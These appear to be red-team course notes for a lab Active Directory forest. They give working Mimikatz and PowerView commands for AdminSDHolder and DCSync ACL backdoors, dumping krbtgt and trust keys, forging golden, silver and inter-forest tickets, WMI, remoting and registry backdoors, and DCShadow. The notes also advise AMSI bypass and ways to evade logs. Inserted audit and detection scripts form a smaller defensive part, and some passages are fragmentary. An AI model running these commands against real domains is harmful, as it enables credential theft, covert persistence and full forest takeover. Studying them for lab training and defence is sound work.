PowerView: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
PowerView: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

After modifying the ACL, propagate it with Invoke-SDPropagator (or wait for the hourly SDProp run), then check the Domain Admins ACL to verify that the propagation worked (normal domain user):
PowerView: Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}
AD Module: (Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}

With FullControl on AdminSDHolder (and hence on DA), we could add a member to Domain Admins (or to any other protected group). Adding members is not recommended, since that is exactly what gets detected, but for completeness, run as student1 once the rights have propagated:
PowerView_Dev: Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
AD Module: Add-ADGroupMember -Identity 'Domain Admins' -Members testda

Abusing the ResetPassword permission to reset the password of testda (or of any account that is already a DA), again as student1:
PowerView_Dev: Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
AD Module: Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

PERSISTENCE using ACLs - Rights Abuse

- There are even more interesting ACLs that can be abused, like the ACL of the domain object itself.
- For example, with DA privileges the ACL of the domain root can be modified to:
  a.) provide useful rights like FullControl, or
  b.) grant the ability to run DCSync.
- To perform DCSync, only 3 rights are needed: 'Replicating Directory Changes', 'Replicating Directory Changes All' and 'Replicating Directory Changes In Filtered Set' (in practice the first two are enough; the third only matters for RODC-filtered attributes).
- If we give these rights to a normal domain user, that user can DCSync and dump the krbtgt hash whenever needed, without being a member of any privileged group.

FullControl rights (DA privs required):
PowerView_Dev: Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student1 -Rights All -Verbose
AD Module: Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

DCSync rights, a.k.a. replication rights (DA privs required):
PowerView_Dev: Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
AD Module: Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose

Execute DCSync (as student1; no DA privs needed once the rights have been added):
Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\krbtgt" '
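Auditing the two ACL backdoors above (AdminSDHolder and replication rights on the domain root), as an added example that is not part of the original notes. It reads the ACLs through the AD: drive of the RSAT ActiveDirectory module, which any domain user can do, and lists principals that hold DCSync-relevant or write-class rights outside an expected list. The expected-principal list is mine and must be tuned per forest; Exchange and other products legitimately add entries, so treat the output as a review queue.

```powershell
# Added example, not from the CRTP page: audit replication rights on the domain root and
# write-class ACEs on AdminSDHolder. Needs the RSAT ActiveDirectory module (AD: drive);
# reading these ACLs needs no DA privs. Expected principals are an assumption to tune.
Import-Module ActiveDirectory

# Extended rights that make up DCSync. Get-Changes + Get-Changes-All are sufficient;
# In-Filtered-Set is only needed for RODC-filtered attributes.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$ExpectedPrincipals = @(
    'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'Domain Admins', 'Enterprise Admins',
    'Domain Controllers', 'Read-only Domain Controllers', 'Enterprise Read-only Domain Controllers',
    'Cert Publishers', 'Terminal Server License Servers'
)

function Test-ExpectedPrincipal([string]$Identity) {
    # IdentityReference looks like 'DCORP\Domain Admins' or 'NT AUTHORITY\SYSTEM'; match on either form.
    $short = ($Identity -split '\\')[-1]
    return ($ExpectedPrincipals -contains $Identity) -or ($ExpectedPrincipals -contains $short)
}

function Get-DcSyncPrincipal {
    # Every principal holding a replication extended right, all extended rights, or GenericAll on the domain root.
    $domainDn = (Get-ADDomain).DistinguishedName
    (Get-Acl -Path "AD:\$domainDn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll' } |
        ForEach-Object {
            $guid  = $_.ObjectType.ToString()
            $right = if ($_.ActiveDirectoryRights -match 'GenericAll') { 'GenericAll (includes replication rights)' }
                     elseif ($guid -eq '00000000-0000-0000-0000-000000000000') { 'All extended rights' }
                     elseif ($ReplicationRights.ContainsKey($guid)) { $ReplicationRights[$guid] }
            if ($right) {
                [pscustomobject]@{
                    Identity   = $_.IdentityReference.Value
                    Right      = $right
                    Unexpected = -not (Test-ExpectedPrincipal $_.IdentityReference.Value)
                }
            }
        }
}

function Get-AdminSDHolderAnomaly {
    # Write-class ACEs on AdminSDHolder for principals outside the expected list. SDProp copies
    # them to every protected group and member within an hour, which is the persistence trick above.
    $domainDn = (Get-ADDomain).DistinguishedName
    (Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$domainDn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight' -and
                       -not (Test-ExpectedPrincipal $_.IdentityReference.Value) } |
        Select-Object @{ n = 'Identity'; e = { $_.IdentityReference.Value } },
                      ActiveDirectoryRights,
                      @{ n = 'ObjectType'; e = { $_.ObjectType } }   # attribute or extended-right GUID; all zeros = everything
}

# Usage:
# Get-DcSyncPrincipal | Where-Object Unexpected    # e.g. student1 after Add-ObjectAcl -Rights DCSync
# Get-AdminSDHolderAnomaly                          # e.g. student1 with GenericAll after the AdminSDHolder step
```

A principal that shows up with both Get-Changes and Get-Changes-All (or with GenericAll) can run lsadump::dcsync exactly as in the last command above, so that pair is the one to act on; a lone Get-Changes entry is the Enterprise Read-only Domain Controllers default and is harmless on its own.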

PERSISTENCE using ACLs - Security Descriptors

- It is possible to modify the security descriptors (the security information of an object: Owner, Primary Group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users.
- Administrative privileges on the target (local admin) are required to make the change.
- It works as a very useful and impactful backdoor mechanism.
- In short: remote access protocols like WMI, PS Remoting, etc. are by default only usable by admins to log on to machines. We modify their security descriptors so that even non-admin users can use them, and later get admin-equivalent access to the machines with a plain user account.

- Security Descriptor Definition Language (SDDL) is the string format used to describe a security descriptor.
- SDDL uses ACE strings for the DACL and SACL, with the fields separated by semicolons:
  ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
- ACE for built-in administrators on WMI namespaces:
  (A;CI;CCDCLCSWRPWPRCWD;;;SID)
  (A = allow; CI = container inherit, i.e. applies to sub-namespaces; the rights are CreateChild, DeleteChild, ListChildren, SelfWrite, ReadProperty, WriteProperty, ReadControl and WriteDac.)
Reference:
https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings
- So if we replace the SID part of the ACE string above with the SID of the user/account that we want to give access to the protocol namespace, that account gets the same rights there as the built-in administrators. Let's see how!
There are 2 ways to do it:
1. Using the GUI
2. Using scripts

WMI

- In our example we give 'studentadmin' WMI access to the Domain Controller without giving admin privileges to the 'studentadmin' user.
- WMI authentication consists of 2 parts:
  1. We must have the privileges to connect to the DCOM endpoint.
  2. We must have the privileges to connect to the namespace.

Method 1: Using the GUI (on the DC)
a.) Grant privileges to connect to the DCOM endpoint:
Press Windows Key > open Component Services > Component Services > Computers > My Computer > Properties > COM Security > Edit Limits (for both Access Permissions and Launch and Activation Permissions) > Add > studentadmin > give all permissions (4) > Apply > OK
b.) Grant privileges to connect to the WMI namespaces:
Server Manager > Tools > Computer Management > Services and Applications > WMI Control > Properties > Security tab > Security > Add > studentadmin > give all permissions > Advanced > studentadmin > Edit > Applies to: This namespace and subnamespaces > OK > Apply > OK

Verify with the command below that our user (studentadmin here) can query the DC using WMI (normal user):
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
(Lists the class instance and OS info from the DC with the privileges of studentadmin.)

Method 2: Using scripts (Set-RemoteWMI)
The ACLs can be modified from a script to allow non-admin users access to the securable objects (admin privs on the target required; DA privs in the lab):
Set-RemoteWMI -UserName student1 -Verbose
(on the local machine, for student1)
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose
(on a remote machine, for student1, without explicit credentials)
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential Administrator -namespace 'root\cimv2' -Verbose
(on a remote machine, with explicit credentials; only root\cimv2 and the nested namespaces)
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Remove -Verbose
(removes the access again)

Verify as before that our user (student1 here) can query the DC using WMI (normal user):
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

PowerShell Remoting
(admin privs on the target required; DA privs in the lab)
Set-RemotePSRemoting -UserName student1 -Verbose
(on the local machine, for student1)
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
(on a remote machine, for student1, without explicit credentials)
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Remove
(removes the access again)

Verify that our user (student1 here) can PS Remote onto the DC (normal user):
Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Editing the remote registry (DAMP, https://github.com/HarmJ0y/DAMP)
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student1 -Verbose
(Edits the security descriptors of the required registry keys on the DC so that the trustee can run the commands below; admin privs required, DA privs in the lab.)
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
(Fetches the machine account hash of the DC as a normal user, student1 here. With it, silver tickets for the DC can be forged at any time, as shown above.)
Get-RemoteLocalAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
(Fetches the hashes of all local accounts on the DC, including the DSRM administrator, as a normal user.)
Get-RemoteCachedCredential -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
(Fetches the cached credentials on the DC as a normal user.)
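The SID swap described above is easy to see once the descriptor is decoded. The block below, an added example that is not part of the original notes, parses the DACL of a WMI namespace or PS Remoting endpoint from its SDDL, flags trustees written as explicit domain SIDs (which never appear in the defaults), and builds the backdoor ACE from the page for a chosen SID. The sample descriptors are constructed (the default root\cimv2 and Microsoft.PowerShell DACLs plus one injected ACE), the RID 1116 is hypothetical, and the live readers at the end use __SystemSecurity and Get-PSSessionConfiguration.

```powershell
# Added example, not from the CRTP page: decode SDDL DACLs of WMI namespaces and WinRM
# endpoints, flag explicit domain SIDs, and build the page's backdoor ACE for a given SID.
# Samples are constructed; RID 1116 is hypothetical. Live readers need local admin.

# SDDL right abbreviations (subset that covers the WMI/WinRM descriptors discussed above).
$SddlRights = @{
    CC = 'CreateChild';  DC = 'DeleteChild';  LC = 'ListChildren'; SW = 'SelfWrite';      RP = 'ReadProperty'
    WP = 'WriteProperty'; RC = 'ReadControl'; WD = 'WriteDac';     WO = 'WriteOwner';     SD = 'Delete'
    GA = 'GenericAll';   GR = 'GenericRead';  GW = 'GenericWrite'; GX = 'GenericExecute'; CR = 'ControlAccess'
}
# Well-known SID aliases found in default descriptors.
$SddlTrustees = @{
    BA = 'BUILTIN\Administrators'; AU = 'Authenticated Users'; NS = 'NT AUTHORITY\NETWORK SERVICE'
    LS = 'NT AUTHORITY\LOCAL SERVICE'; SY = 'NT AUTHORITY\SYSTEM'; BU = 'BUILTIN\Users'
    WD = 'Everyone'; IU = 'Interactive'; RM = 'BUILTIN\Remote Management Users'
}

function ConvertFrom-SddlDacl {
    param([Parameter(Mandatory)][string]$Sddl)
    # Isolate the DACL: "D:" + optional control flags (P, AI, AR) + one or more "(...)" ACEs; stops at "S:".
    if (-not ($Sddl -match 'D:[A-Z]*(?<dacl>(?:\([^)]*\))+)')) { return }
    $acePattern = '\((?<type>[^;]*);(?<flags>[^;]*);(?<rights>[^;]*);(?<obj>[^;]*);(?<inh>[^;]*);(?<sid>[^)]*)\)'
    foreach ($m in [regex]::Matches($Matches['dacl'], $acePattern)) {
        $r = $m.Groups['rights'].Value
        # Rights are either a hex mask (0x...) or a run of two-letter codes.
        $names = @()
        if ($r -like '0x*') { $names = @($r) }
        else {
            for ($i = 0; $i + 1 -lt $r.Length; $i += 2) {
                $code = $r.Substring($i, 2)
                $names += $(if ($SddlRights[$code]) { $SddlRights[$code] } else { $code })
            }
        }
        $sid = $m.Groups['sid'].Value
        [pscustomobject]@{
            Type     = if ($m.Groups['type'].Value -eq 'A') { 'Allow' } else { $m.Groups['type'].Value }
            Flags    = $m.Groups['flags'].Value        # CI = container inherit, applies to sub-namespaces
            Rights   = $names -join ','
            Trustee  = if ($SddlTrustees[$sid]) { $SddlTrustees[$sid] } else { $sid }
            Explicit = $sid -like 'S-1-5-21-*'         # a domain SID spelled out: not part of any default
        }
    }
}

function New-WmiBackdoorAce {
    # The page's ACE for built-in administrators on a WMI namespace, with the SID swapped for ours.
    param([Parameter(Mandatory)][string]$Sid, [string]$Rights = 'CCDCLCSWRPWPRCWD', [string]$Flags = 'CI')
    "(A;$Flags;$Rights;;;$Sid)"
}

# Constructed samples: the lab domain SID with a hypothetical RID, appended to the default DACLs.
$backdoorSid = 'S-1-5-21-268341927-4156871508-1792461683-1116'
$wmiSddl   = 'O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)' + (New-WmiBackdoorAce -Sid $backdoorSid)
$winrmSddl = "O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;RM)(A;;GA;;;IU)(A;;GA;;;$backdoorSid)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"

ConvertFrom-SddlDacl $wmiSddl   | Format-Table -AutoSize   # last row: Explicit = True with the admin right set
ConvertFrom-SddlDacl $winrmSddl | Format-Table -AutoSize   # GenericAll for the injected SID beside BA/RM/IU

# Live readers: run on the host (wrap in Invoke-Command for a remote DC) and pipe into ConvertFrom-SddlDacl.
function Get-WmiNamespaceSddl([string]$Namespace = 'root\cimv2') {
    $sd = (Invoke-WmiMethod -Namespace $Namespace -Path __SystemSecurity -Name GetSecurityDescriptor).Descriptor
    (New-Object System.Management.ManagementClass('root\cimv2:Win32_SecurityDescriptorHelper')).Win32SDToSDDL($sd).SDDL
}
function Get-PSRemotingSddl([string]$Name = 'Microsoft.PowerShell') {
    (Get-PSSessionConfiguration -Name $Name).SecurityDescriptorSddl
}
# ConvertFrom-SddlDacl (Get-WmiNamespaceSddl) | Where-Object Explicit
# ConvertFrom-SddlDacl (Get-PSRemotingSddl)   | Where-Object Explicit
```

Set-RemoteWMI and Set-RemotePSRemoting produce exactly the kind of ACE the two samples carry, so "Explicit" rows are the backdoors to look for; a group such as Remote Management Users shows up as an alias instead and is part of the default. Remember that WMI access also needs the DCOM limits from step a.) above, which live in HKLM\SOFTWARE\Microsoft\Ole and are a separate descriptor to review.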
Information Obtained / Comments
AMSI is Anti-Malware Scan Interface which was introduced in
PowerShell. It provides the registered AV on the machine to
look/analyze the scripts that we load in the memory.

To use Invoke-Mimikatz, always obfuscate it or bypass AMSI

You can omit the -ComputerName if we are interactively logged in to


a DC using DA privs :
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
kerberos::golden - Name of the module
/User:Administrator - Username for which the TGT is generated
/domain:dollarcorp.moneycorp.local - Domain FQDN
/sid:<sid_id> - SID of the domain
/krbtgt - NTLM (RC4) hash of the krbtgt account. Use /aes128 and
/aes256 for using AES keys
/id:500 /groups:512 - Optional user RID(default 500) and group
default - 513, 512, 520, 518, 519
/ptt - Injects the ticket in the current powershell process (no need to
save the ticket to the disk)
(or)
/ticket - Saves the ticket to a file for later use
/startoffset:0 - Optional when the ticket is available (default 0 - in
minutes). Use negative for a ticket available from the past and a
larger number for the future.
/endin:600 - Optional ticket lifetime (default=10years) in minutes.
The default AD setting is 10 hours (600 minutes)
/renewmax:10080 - Optional ticket lifetime with renewal (default is
10 years) in minutes. The default AD setting is 7 days - 10080
Instead of dumping hashes as shown in row 63, what we can also do
is try to do it using the DCSync attack. DCSync is very silent on the
domain logs. With our DA privs, we simply request a piece of info
from the DC and the DC complies with us.

Using the DCSync option needs no code execution (no need to run
Invoke-Mimikatz) on the target DC.

e ticket (TGT)
resented the TGS ticket

d by the hash of the krbtgt account) of the service running with that account

be targeting machine accounts (in particular - the domain controller machine account)

Information Obtained / Comments
You can omit -ComputerName if we are interactively logged in to a DC using DA privs:
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '

kerberos::golden - Name of the module (there is no Silver module!)
/User:Administrator - Username for which the ticket is generated
/domain:dollarcorp.moneycorp.local - Domain FQDN
/sid:<sid_id> - SID of the domain
/target:dcorp-dc.dollarcorp.moneycorp.local - Target server FQDN
/service:CIFS - The SPN name of the service for which the TGS is to be created
/rc4 - NTLM (RC4) hash of the service account. Use /aes128 and /aes256 for using AES keys
/id:500 /groups:512 - Optional user RID (default 500) and groups (default - 513, 512, 520, 518, 519)
/ptt - Injects the ticket in the current PowerShell process (no need to save the ticket to the disk)
(or)
/ticket - Saves the ticket to a file for later use
/startoffset:0 - Optional, when the ticket becomes available (default 0, in minutes). Use a negative value for a ticket available from the past and a larger number for the future.
/endin:600 - Optional ticket lifetime (default 10 years) in minutes. The default AD setting is 10 hours (600 minutes)
/renewmax:10080 - Optional ticket lifetime with renewal (default 10 years) in minutes. The default AD setting is 7 days (10080 minutes)
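As an added defender-side example (not part of the original checklist), a check built on the /endin and /renewmax defaults quoted above for both golden and silver tickets: a ticket forged with Mimikatz's 10-year defaults stands out against the domain's 10-hour / 7-day policy, because a KDC never issues a ticket beyond the policy maximum. The klist output it parses is constructed, and the field layout is assumed to match what klist prints on Windows.

```python
import re
from datetime import datetime, timedelta

# Constructed klist-style output (not from the page). Ticket #0 carries the
# 10-year /endin and /renewmax a default Mimikatz golden ticket is forged with;
# ticket #1 has the 10-hour / 7-day values the domain policy actually issues.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/4/2024 9:00:00 (local)
        End Time:   3/2/2034 9:00:00 (local)
        Renew Time: 3/2/2034 9:00:00 (local)

#1>     Client: student1 @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/4/2024 9:00:00 (local)
        End Time:   3/4/2024 19:00:00 (local)
        Renew Time: 3/11/2024 9:00:00 (local)
"""

# Domain defaults quoted on the page: 600 minutes ticket lifetime,
# 10080 minutes (7 days) renewal lifetime.
POLICY_MAX_TICKET = timedelta(minutes=600)
POLICY_MAX_RENEW = timedelta(minutes=10080)

# "Key: value" lines, optionally prefixed with the "#N>" ticket index.
FIELD_RE = re.compile(r"^\s*(?:#\d+>)?\s*([A-Za-z ]+?):\s*(.*?)\s*$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def _parse_time(value):
    """'3/4/2024 9:00:00 (local)' -> datetime; the '(local)' suffix is dropped."""
    return datetime.strptime(value.split(" (")[0], TIME_FMT)


def parse_klist(text):
    """Split klist output into one dict per cached ticket."""
    tickets = []
    for block in re.split(r"\n(?=#\d+>)", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1).strip().lower()] = m.group(2)
        if "client" not in fields:
            continue
        tickets.append({
            "client": fields["client"].split(" @ ")[0],
            "server": fields["server"].split(" @ ")[0],
            "etype": fields.get("kerbticket encryption type", ""),
            "start": _parse_time(fields["start time"]),
            "end": _parse_time(fields["end time"]),
            "renew": _parse_time(fields["renew time"]),
        })
    return tickets


def audit_ticket_lifetimes(text, max_ticket=POLICY_MAX_TICKET,
                           max_renew=POLICY_MAX_RENEW):
    """Return (client, server, reason) for every ticket whose validity window
    is longer than the domain policy could have issued."""
    findings = []
    for t in parse_klist(text):
        lifetime = t["end"] - t["start"]
        renewable = t["renew"] - t["start"]
        if lifetime > max_ticket:
            findings.append((t["client"], t["server"],
                             f"lifetime {lifetime} exceeds policy maximum {max_ticket}"))
        if renewable > max_renew:
            findings.append((t["client"], t["server"],
                             f"renew window {renewable} exceeds policy maximum {max_renew}"))
    return findings


if __name__ == "__main__":
    for client, server, reason in audit_ticket_lifetimes(SAMPLE_KLIST):
        print(f"{client} -> {server}: {reason}")
```

An operator who sets /endin:600 /renewmax:10080 defeats this check, which is why the event-based detections later on the page are still needed.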


Information Obtained / Comments
When used in an actual red team, please ensure that you modify the script and use a stronger skeleton key than "mimikatz".

Information Obtained / Comments
( Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -ComputerName dcorp-dc.dollarcorp.moneycorp.local ) gives us hashes from the lsass process, whereas dumping the DSRM password gives hashes from the SAM hive.

Information Obtained / Comments
For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

a.) Import-Module .\Microsoft.ActiveDirectory.Management.dll
b.) Import-Module .\ActiveDirectory\ActiveDirectory.psd1
c.) . .\Set-ADACL.ps1
d.) Command given

Information Obtained / Comments

Information Obtained / Comments
very silent

very silent

DCSync is generally used for the krbtgt account, to get its hash.
But that does not mean that we cannot use it for other accounts as well.
Eg:
Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\Administrator" '

We are going to modify the security descriptors and allow even non-admin users to use the protocols and logon to

Information Obtained / Comments
Use this command if a normal user is able to WMI onto the DC.

Information Obtained / Comments
Use this command if a normal user is able to PS Remote onto the DC.

J0y/DAMP)
Load the module before executing the script:
. .\Add-RemoteRegBackdoor.ps1

After executing the script, we need to edit another script (RemoteHashRetrieval.ps1):
Replace $IV with $InitV

And then load the script:
. .\RemoteHashRetrieval.ps1

With this (machine account hash), we can create a silver ticket for any service on the Domain Controller.

This hash is the same as the DSRM Administrator on the DC.


Tool | Command | Description | Privileges

Priv Esc (Child to Parent):
- Child to Forest Root
- Domains in the same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.
- There are 2 ways of escalating privileges between two domains of the same forest:
  * Krbtgt hash
  * Trust tickets

Method 1 - Trust Tickets
- Child to Forest root using trust tickets.
- So, what is required to forge trust tickets is obviously the trust key.
- Look for the [In] trust key from child to parent.

Step 1 : Get the trust key (Domain Admin privs)
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "lsadump::trust /patch" ' -ComputerName dcorp-dc
(or)
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\mcorp$" '

Once we have the trust key, we can forge an inter-realm TGT.

Step 2 : Forge the inter-realm TGT (Normal Domain User)
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /sids:<SID of the Enterprise Admins group of parent domain> /rc4:<trust_key> /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi" '

After forging the inter-realm TGT, we need to present it to the parent DC and ask for a TGS.

Step 3 : Get a TGS for a service (like CIFS) in the target domain by using the forged trust ticket (Normal Domain User)
kekeo_old (asktgs.exe): .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

Use the TGS to access the targeted service.

Step 4 : Convert the TGS to an injectable format and inject it (using kirbikator - kekeo_old) (Normal Domain User)
kekeo_old (kirbikator.exe): .\kirbikator.exe lsa <TGS ticket>
Now, we should be able to access the file system (CIFS) on the parent domain controller.

Method 2 - KRBTGT HASH
We will abuse the SID history, once again.
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '

Forging an inter-realm TGT (Normal Domain User)
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<Domain_SID> /sids:<Enterprise Admins SID> /krbtgt:<krbtgt hash> /ticket:C:\AD\Tools\krbtgt_tkt.kirbi" '

Note : in case you want to abuse the HOST service instead of CIFS, you can check whether the target HOST service in the parent domain is accessible by:
gwmi -Class win32_operatingsystem -ComputerName mcorp-dc
(this is just like how we used to test "ls \\mcorp-dc.moneycorp.local\c$" for CIFS, only this one (gwmi) is for the HOST service and not CIFS)

Injecting the forged TGT (Normal Domain User)
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi" '

Note :
Instead of using the SID history of the Enterprise Admins group, we can stay more silent and avoid suspicious logs by abusing the SID history of the Domain Controllers group and the Enterprise Domain Controllers group.

Avoid suspicious logs :
Invoke-Mimikatz -Command ' "kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /groups:516 /sids:<domain controllers group SID>,<enterprise domain controllers group SID> /krbtgt:<krbtgt_hash> /ptt" '
Information Obtained / Comments
Here, the NetBIOS name of the parent domain is mcorp. So, we have given the user value as dcorp\mcorp$.

Kerberos::golden - The Mimikatz module
/domain:dollarcorp.moneycorp.local - FQDN of the current domain
/sid - SID of the current domain
/sids - SID of the Enterprise Admins group of the parent domain
/rc4 - RC4 of the trust key
/user - User to impersonate
/service - Target service in the parent domain
/target - FQDN of the parent domain
/ticket - Path where the ticket is to be saved

Tickets for other services (like HOST & RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well.

P.S. - please ensure that there is no other inter-realm TGT in the same folder or injected into memory while you are requesting a TGS.

Here, the "/sids" option is forcefully setting the SID History for the Enterprise Admins group for dollarcorp.moneycorp.local, that is, the forest Enterprise Admins group.

- One difference between escalating to cross-forest attacks and escalating to enterprise admins is that, in case of cross-forest attacks, we cannot abuse the SID history.
- This is because of SID filtering at the forest level.

Tool | Command | Description | Privileges
Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
- dump domain secrets (get the trust key) - Domain Admin

Mimikatz (Invoke-Mimikatz): Invoke-Mimikatz -Command ' "Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<sid_id> /rc4:<trust_key> /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi" '
- forging an inter-forest TGT - Domain Admin

kekeo_old: .\asktgs.exe <inter-forest TGT> CIFS/eurocorp-dc.eurocorp.local
- requesting a TGS from the target forest - Domain Admin

kekeo_old: .\kirbikator.exe lsa <TGS>
- injecting the TGS into the session - Domain Admin

Now, we cannot do something like ls \\eurocorp-dc.eurocorp.local\c$ unless we explicitly have access to the c$ on the target forest's DC.
We can only access the resources that are explicitly shared with our forest DA.

1. Client requests TGT
2. Our forest DC provides TGT
3. Client requests TGS for a service hosted in another forest
4. Our forest DC provides an inter-realm TGT to the client
5. The inter-realm TGT is provided by the client to the target forest's DC
6. The target forest's DC decrypts the inter-realm TGT because it has the Trust Key and sends the TGS to the client.
7. Client presents TGS to the application server for access.

- Trust abuse across Forests
- We require the Trust Key for the inter-forest trust. This can be obtained by:
  - Invoke-Mimikatz -Command ' "lsadump::trust /patch" '
  (or)
  - Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
Note:
The privilege that a domain admin has in our forest does not mean that the member will get DA privs in the other (trusted) forest as well; the member will get the privs that are explicitly assigned to it.

Information Obtained / Comments
Check for the NetBIOS name of the target forest; the NTLM hash of the NetBIOS name will be the trust key. Here, the target forest is eurocorp.local.

Check with klist.


- DCShadow temporarily registers a new domain controller in the target domain and uses it to push attributes like SID history, SPNs, etc. on specified objects without leaving the change logs for the modified object.
- The new DC is registered by modifying the Configuration container, the SPNs of an existing computer object and a couple of RPC services.
- Because the attributes are changed from a "domain controller", there are no directory change logs on the actual DC for the target object.
- By default, DA privs are required for DCShadow.
- Usually, to abuse this, the attacker's machine should be part of the root domain.

- We can use Mimikatz for DCShadow.
- Two instances of Mimikatz are required:
  * One to start RPC servers (service) with SYSTEM privs and specify attributes to be modified:
    !+
    !processtoken
    lsadump::dcshadow /object:root1user /attribute:Description /value:"Hello from DCShadow"
  * Second with enough privs (DA or otherwise) to push the values:
    lsadump::dcshadow /push

Tool | Command | Description | Privileges
Instance1 - Mimikatz (Mimikatz.exe):
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value:"Hello from DCShadow"
- start RPC service and specify attributes to be modified - SYSTEM privs

Instance2 - Mimikatz (Mimikatz.exe):
lsadump::dcshadow /push
- push the attribute's values - DA or higher privs

Information Obtained / Comments
We are using mimikatz.exe instead of Invoke-Mimikatz, because the script does not show proper output for DCShadow.

